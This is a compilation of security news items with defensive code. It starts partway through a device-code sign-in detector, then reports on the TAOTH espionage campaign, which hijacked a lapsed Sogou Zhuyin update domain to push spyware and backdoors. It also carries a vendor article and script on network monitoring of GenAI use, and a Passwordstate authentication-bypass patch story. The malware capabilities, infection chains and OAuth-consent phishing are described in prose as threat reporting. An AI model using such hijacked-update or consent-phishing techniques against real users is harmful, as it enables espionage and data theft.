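        if rec["protocol"] == "deviceCode":
            device_code_users.add(user)
        known.add(ip)
    return [f for f in findings if f["reasons"]]


if __name__ == "__main__":
    for f in flag_device_code_signins(parse_records(SAMPLE_LOG), "2025-08-22T00:00:00"):
        print(f["user"], f["time"].isoformat(), "; ".join(f["reasons"]))
```

The kiosk account, which uses the flow routinely from a known address, is not reported; both reasons are heuristics to triage, not proof of compromise.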
Abandoned Sogou Zhuyin Update Server Hijacked, Weaponized in Taiwan Espionage Campaign
An abandoned update server associated with input method editor (IME) software Sogou Zhuyin was leveraged by threat actors as part of an espionage campaign to deliver several malware families, including C6DOOR and GTELAM, in attacks primarily targeting users across Eastern Asia. “Attackers employed sophisticated infection chains, such as hijacked software updates and fake cloud storage or login pages, to distribute malware and collect sensitive information,” Trend Micro researchers Nick Dai and Pierre Lee said in an exhaustive report. The campaign, identified in June 2025, has been codenamed TAOTH by the cybersecurity company. Targets of the activity mainly include dissidents, journalists, researchers, and technology/business leaders in China, Taiwan, Hong Kong, Japan, South Korea, and overseas Taiwanese communities.
Taiwan accounts for 49% of all targets, followed by Cambodia (11%) and the U.S. (7%). It’s said the attackers, in October 2024, took control of the lapsed domain name (“sogouzhuyin[.]com”) associated with Sogou Zhuyin, a legitimate IME service that stopped receiving updates in June 2019, to disseminate malicious payloads a month later. It’s estimated that several hundred victims were impacted.
“The attacker took over the abandoned update server and, after registering it, used the domain to host malicious updates since October 2024,” the researchers said. “Through this channel, multiple malware families have been deployed, including GTELAM, C6DOOR, DESFY, and TOSHIS.” The deployed malware families serve different purposes, including remote access (RAT), information theft, and backdoor functionality. To evade detection, the threat actors also leveraged third-party cloud services to conceal their network activities across the attack chain. These malware strains enable remote access, information theft, and backdoor functionality, with the attackers also using legitimate cloud storage services like Google Drive as a data exfiltration point and to conceal the malicious network traffic.
The attack chain begins when unsuspecting users download the official installer for Sogou Zhuyin from the Internet, such as the Traditional Chinese Wikipedia page entry for Sogou Zhuyin, which, in March 2025, was modified to point users to the malicious domain dl[.]sogouzhuyin[.]com. While the installer is completely innocuous, the malicious activity kicks in when the automatic update process is triggered a couple of hours after installation, causing the updater binary, “ZhuyinUp.exe,” to fetch an update configuration file from an embedded URL: “srv-pc.sogouzhuyin[.]com/v1/upgrade/version.” It’s this update process that has been tampered with to deliver DESFY, GTELAM, C6DOOR, and TOSHIS with the ultimate goal of profiling and gathering data from high-value targets:
- TOSHIS (First detected December 2024), a loader designed to fetch next-stage payloads (Cobalt Strike or Merlin agent for Mythic framework) from an external server. It’s also a variant of Xiangoop, which has been attributed to Tropic Trooper and has been used to deliver Cobalt Strike or a backdoor called EntryShell in the past.
- DESFY (First detected May 2025), a spyware that collects file names from two locations: Desktop and Program Files
- GTELAM (First detected May 2025), another spyware that collects file names matching a specific set of extensions (PDF, DOC, DOCX, XLS, XLSX, PPT, and PPTX), and exfiltrates the details to Google Drive
- C6DOOR, a bespoke Go-based backdoor that uses HTTP and WebSocket protocols for command-and-control so as to receive instructions to gather system information, run arbitrary commands, perform file operations, upload/download files, capture screenshots, list running processes, enumerate directories, and inject shellcode into a targeted process
Further analysis of C6DOOR has uncovered the presence of embedded Simplified Chinese characters within the sample, suggesting that the threat actor behind the artifact may be proficient in Chinese.
“It appears that the attacker was still in the reconnaissance phase, primarily seeking high-value targets,” Trend Micro said. “As a result, no further post-exploitation activities were observed in the majority of victim systems. In one of the cases we analyzed, the attacker was inspecting the victim’s environment and establishing a tunnel using Visual Studio Code.” Interestingly, there is evidence that TOSHIS was also distributed to targets using a phishing website, likely in connection with a spear-phishing campaign targeting Eastern Asia and, to a lesser extent, Norway and the U.S. The phishing attacks have also been observed adopting a two-pronged approach:
- Serving fake login pages with lures related to free coupons or PDF readers that redirect and grant OAuth consent to attacker-controlled apps, or
- Serving fake cloud storage pages that mimic Tencent Cloud StreamLink to download malicious ZIP archives containing TOSHIS
These phishing emails include a booby-trapped URL and a decoy document that tricks the recipient into interacting with the malicious content, ultimately activating a multi-stage attack sequence designed to drop TOSHIS using DLL side-loading or obtain unauthorized access and control over their Google or Microsoft mailboxes through an OAuth permission prompt.
Trend Micro said TAOTH shares infrastructure and tooling overlap with previously documented threat activity by ITOCHU, painting the picture of a persistent threat actor with a focus on reconnaissance, espionage, and email abuse. To combat these threats, organizations are recommended to routinely audit their environments for any end-of-support software and promptly remove or replace such applications. Users are urged to review the permissions requested by cloud applications before granting access. “In the Sogou Zhuyin operation, the threat actor maintained a low profile, conducting reconnaissance to identify valuable targets among victims,” the company said.
“Meanwhile, in the ongoing spear-phishing operations, the attacker distributed malicious emails to the targets for further exploitation.”
Can Your Security Stack See ChatGPT? Why Network Visibility Matters
Generative AI platforms like ChatGPT, Gemini, Copilot, and Claude are increasingly common in organizations. While these solutions improve efficiency across tasks, they also present new data leak prevention challenges for generative AI. Sensitive information may be shared through chat prompts, files uploaded for AI-driven summarization, or browser plugins that bypass familiar security controls. Standard DLP products often fail to register these events.
Solutions such as Fidelis Network® Detection and Response (NDR) introduce network-based data loss prevention that brings AI activity under control. This allows teams to monitor, enforce policies, and audit GenAI use as part of a broader data loss prevention strategy.
Why Data Loss Prevention Must Evolve for GenAI
Data loss prevention for generative AI requires shifting focus from endpoints and siloed channels to visibility across the entire traffic path. Unlike earlier tools that rely on scanning emails or storage shares, NDR technologies like Fidelis identify threats as they traverse the network, analyzing traffic patterns even if the content is encrypted. The critical concern is not just who created the data, but when and how it leaves the organization’s control, whether through direct uploads, conversational queries, or integrated AI features in business systems.
Monitoring Generative AI Usage Effectively
Organizations can use GenAI DLP solutions based on network detection across three complementary approaches:
URL-Based Indicators and Real-Time Alerts
Administrators can define indicators for specific GenAI platforms, for example, ChatGPT. These rules can be applied to multiple services and tailored to relevant departments or user groups. Monitoring can run across web, email, and other sensors.
Process:
- When a user accesses a GenAI endpoint, Fidelis NDR generates an alert
- If a DLP policy is triggered, the platform records a full packet capture for subsequent analysis
- Web and mail sensors can automate actions, such as redirecting user traffic or isolating suspicious messages
Advantages:
- Real-time notifications enable prompt security response
- Supports comprehensive forensic analysis as needed
- Integrates with incident response playbooks and SIEM or SOC tools
Considerations:
- Maintaining up-to-date rules is necessary as AI endpoints and plugins change
- High GenAI usage may require alert tuning to avoid overload
Metadata-Only Monitoring for Audit and Low-Noise Environments
Not every organization needs immediate alerts for all GenAI activity. Network-based data loss prevention policies often record activity as metadata, creating a searchable audit trail with minimal disruption.
- Alerts are suppressed, and all relevant session metadata is retained
- Sessions log source and destination IP, protocol, ports, device, and timestamps
- Security teams can review all GenAI interactions historically by host, group, or time frame
Benefits:
- Reduces false positives and operational fatigue for SOC teams
- Enables long-term trend analysis and audit or compliance reporting
Limits:
- Important events may go unnoticed if not regularly reviewed
- Session-level forensics and full packet capture are only available if a specific alert escalates
In practice, many organizations use this approach as a baseline, adding active monitoring only for higher-risk departments or activities.
Detecting and Preventing Risky File Uploads
Uploading files to GenAI platforms introduces a higher risk, especially when handling PII, PHI, or proprietary data. Fidelis NDR can monitor such uploads as they happen. Effective AI security and data protection means closely inspecting these movements.
Process:
- The system recognizes when files are being uploaded to GenAI endpoints
- DLP policies automatically inspect file contents for sensitive information
- When a rule matches, the full context of the session is captured, even without user login, and device attribution provides accountability
Advantages:
- Detects and interrupts unauthorized data egress events
- Enables post-incident review with full transactional context
Considerations:
- Monitoring works only for uploads visible on managed network paths
- Attribution is at the asset or device level unless user authentication is present
Weighing Your Options: What Works Best
- Real-Time URL Alerts
  - Pros: Enables rapid intervention and forensic investigation, supports incident triage and automated response
  - Cons: May increase noise and workload in high-use environments, needs routine rule maintenance as endpoints evolve
- Metadata-Only Mode
  - Pros: Low operational overhead, strong for audits and post-event review, keeps security attention focused on true anomalies
  - Cons: Not suited for immediate threats, investigation required post-factum
- File Upload Monitoring
  - Pros: Targets actual data exfiltration events, provides detailed records for compliance and forensics
  - Cons: Asset-level mapping only when login is absent, blind to off-network or unmonitored channels
Building Comprehensive AI Data Protection
A comprehensive GenAI DLP program involves:
- Maintaining live lists of GenAI endpoints and updating monitoring rules regularly
- Assigning a monitoring mode (alerting, metadata, or both) by risk and business need
- Collaborating with compliance and privacy leaders when defining content rules
- Integrating network detection outputs with SOC automation and asset management systems
- Educating users on policy compliance and visibility of GenAI usage
Organizations should periodically review policy logs and update their system to address new GenAI services, plugins, and emerging AI-driven business uses.
Best Practices for Implementation
Successful deployment requires:
- Clear platform inventory management and regular policy updates
- Risk-based monitoring approaches tailored to organizational needs
- Integration with existing SOC workflows and compliance frameworks
- User education programs that promote responsible AI usage
- Continuous monitoring and adaptation to evolving AI technologies
Key Takeaways
Modern network-based data loss prevention solutions, as illustrated by Fidelis NDR, help enterprises balance the adoption of generative AI with strong AI security and data protection. By combining alert-based, metadata, and file-upload controls, organizations build a flexible monitoring environment where productivity and compliance coexist. Security teams retain the context and reach needed to handle new AI risks, while users continue to benefit from the value of GenAI technology.
This article is a contributed piece from one of our valued partners.
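The alert-versus-metadata split described in the article, sketched as an added example that is not Fidelis code or its API. It assumes session records that carry a destination hostname (for instance taken from the TLS handshake), and the endpoint list, group mapping, and sample sessions are all constructed for illustration.

```python
from datetime import datetime

# Sample GenAI endpoint list and per-group monitoring mode: assumptions for
# this example, to be replaced by the organization's maintained lists.
GENAI_ENDPOINTS = {"chatgpt.com": "ChatGPT", "gemini.google.com": "Gemini",
                   "copilot.microsoft.com": "Copilot", "claude.ai": "Claude"}
GROUP_MODE = {"finance": "alert", "engineering": "metadata"}  # default: metadata
DEVICE_GROUP = {"10.0.1.15": "finance", "10.0.2.40": "engineering"}

# Constructed session metadata (no payload), as a network sensor might export it.
SESSIONS = [
    {"ts": "2025-09-01T09:12:00", "src_ip": "10.0.1.15", "dst_ip": "203.0.113.10",
     "dst_port": 443, "proto": "tls", "host": "chatgpt.com"},
    {"ts": "2025-09-01T10:30:00", "src_ip": "10.0.2.40", "dst_ip": "203.0.113.20",
     "dst_port": 443, "proto": "tls", "host": "claude.ai"},
    {"ts": "2025-09-01T11:00:00", "src_ip": "10.0.3.9", "dst_ip": "203.0.113.30",
     "dst_port": 443, "proto": "tls", "host": "gemini.google.com"},
    # Lookalike host that only contains a listed name: must not match.
    {"ts": "2025-09-01T11:05:00", "src_ip": "10.0.1.15", "dst_ip": "198.51.100.7",
     "dst_port": 443, "proto": "tls", "host": "chatgpt.com.example.net"},
    {"ts": "2025-09-01T11:10:00", "src_ip": "10.0.1.15", "dst_ip": "10.0.0.5",
     "dst_port": 443, "proto": "tls", "host": "intranet.example.com"},
]


def match_endpoint(host):
    """Return the platform name if host is a listed endpoint or a subdomain of one."""
    host = host.lower().rstrip(".")
    for domain, platform in GENAI_ENDPOINTS.items():
        if host == domain or host.endswith("." + domain):
            return platform
    return None


def process(sessions):
    """Always retain metadata for GenAI sessions; alert only for alert-mode groups."""
    audit, alerts = [], []
    for s in sessions:
        platform = match_endpoint(s["host"])
        if platform is None:
            continue
        group = DEVICE_GROUP.get(s["src_ip"], "unassigned")
        entry = dict(s, platform=platform, group=group)
        audit.append(entry)
        if GROUP_MODE.get(group, "metadata") == "alert":
            alerts.append(entry)
    return audit, alerts


def review(audit, group=None, start=None, end=None):
    """Query the audit trail by group and/or ISO-8601 time range."""
    lo = datetime.fromisoformat(start) if start else datetime.min
    hi = datetime.fromisoformat(end) if end else datetime.max
    return [e for e in audit
            if (group is None or e["group"] == group)
            and lo <= datetime.fromisoformat(e["ts"]) <= hi]


if __name__ == "__main__":
    audit, alerts = process(SESSIONS)
    print(len(audit), "sessions in audit trail;", len(alerts), "alert(s)")
```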
Click Studios Patches Passwordstate Authentication Bypass Vulnerability in Emergency Access Page
Click Studios, the developer of enterprise-focused password management solution Passwordstate, said it has released security updates to address an authentication bypass vulnerability in its software. The high-severity issue, which is yet to be assigned a CVE identifier, has been addressed in Passwordstate 9.9 (Build 9972), released August 28, 2025. The Australian company said it fixed a “potential Authentication Bypass when using a carefully crafted URL against the core Passwordstate Products’ Emergency Access page.” Also included in the latest version are improved protections to safeguard against potential clickjacking attacks aimed at its browser extension, should users end up visiting compromised sites. The safeguards are likely in response to findings from security researcher Marek Tóth, who, earlier this month, detailed a technique called Document Object Model (DOM)-based extension clickjacking that several password manager browser add-ons have been found vulnerable to.
“A single click anywhere on an attacker-controlled website could allow attackers to steal users’ data (credit card details, personal data, login credentials, including TOTP),” Tóth said. “The new technique is general and can be applied to other types of extensions.” According to Click Studios, the credential manager is used by 29,000 customers and 370,000 security and IT professionals, spanning global enterprises, government agencies, financial institutions, and Fortune 500 companies. The disclosure comes over four years after the company suffered a supply chain breach that enabled attackers to hijack the software’s update mechanism in order to drop malware capable of harvesting sensitive information from compromised systems. Then in December 2022, Click Studios also resolved multiple security flaws in Passwordstate, including an authentication bypass for Passwordstate’s API (CVE-2022-3875, CVSS score: 9.1) that could have been exploited by an unauthenticated remote adversary to obtain a user’s plaintext passwords.